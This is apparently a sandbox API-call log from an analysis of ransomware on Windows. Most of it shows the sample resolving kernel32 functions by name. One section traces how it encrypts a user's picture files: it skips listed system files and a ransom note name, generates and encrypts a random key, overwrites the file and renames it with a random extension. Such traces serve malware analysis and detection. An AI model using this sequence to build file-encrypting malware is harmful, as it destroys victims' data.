[0086.589] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.589] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.589] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.589] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.589] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.589] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.589] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.589] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.589] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.589] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.589] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.590] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.590] lstrlenA (lpString="DELETEATOM") returned 10 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.590] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.590] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.590] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.590] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.590] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.590] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.590] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.590] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.590] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.590] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.590] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.590] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.590] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.590] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.590] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.590] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.590] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.591] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.591] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.591] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.591] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.591] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.591] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.591] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.591] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.591] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.591] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.591] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.591] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.591] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.591] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.591] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.591] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.591] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.591] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.591] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.592] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.592] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.592] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.592] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.592] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.592] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.639] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.639] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png") returned 62 [0086.639] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png.E5camY") returned 69 [0086.639] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\9moug27.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png.E5camY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\9moug27.png.e5camy"), dwFlags=0x0) returned 1 [0086.640] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.641] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.641] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.641] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c45980, ftCreationTime.dwHighDateTime=0x1d4ca58, ftLastAccessTime.dwLowDateTime=0xd670fb90, ftLastAccessTime.dwHighDateTime=0x1d4cd0b, ftLastWriteTime.dwLowDateTime=0xd670fb90, ftLastWriteTime.dwHighDateTime=0x1d4cd0b, nFileSizeHigh=0x0, nFileSizeLow=0x104d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGnK5Q1b.bmp", cAlternateFileName="")) returned 1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="DECRYPT-FILES.txt") returned -1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="autorun.inf") returned -1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="boot.ini") returned -1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="desktop.ini") returned -1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="ntuser.dat") returned -1 [0086.641] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="iconcache.db") returned -1 [0086.642] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="bootsect.bak") returned -1 [0086.642] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="ntuser.dat.log") returned -1 [0086.642] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="thumbs.db") returned -1 [0086.642] lstrcmpiW (lpString1="AGnK5Q1b.bmp", lpString2="Bootfont.bin") returned -1 [0086.642] lstrlenW (lpString="AGnK5Q1b.bmp") returned 12 [0086.642] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.642] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.642] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.642] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.642] lstrlenW (lpString="AGnK5Q1b.bmp") returned 12 [0086.642] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.642] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="AGnK5Q1b.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp" [0086.642] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\agnk5q1b.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.642] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=66770) returned 1 [0086.642] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.643] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.643] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.643] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.643] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.643] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.643] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.645] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.645] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.646] CloseHandle (hObject=0x42c) returned 1 [0086.646] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.646] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.647] CloseHandle (hObject=0x0) returned 0 [0086.647] CloseHandle (hObject=0x428) returned 1 [0086.647] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.647] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.647] GetTickCount () returned 0x114e1c8 [0086.647] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.647] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.647] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.648] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.648] lstrlenA (lpString="kernel32.dll") returned 12 [0086.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.648] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.648] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.648] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.648] lstrlenA (lpString="ADDATOMA") returned 8 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.648] lstrlenA (lpString="ADDATOMW") returned 8 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.648] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.649] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.649] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.649] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.649] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.649] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.649] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.649] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.649] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.649] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.649] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.649] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.649] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.649] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.649] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.649] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.649] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.649] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.649] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.650] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.650] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.650] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.650] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.650] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.650] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.650] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.650] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.650] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.650] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.650] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") 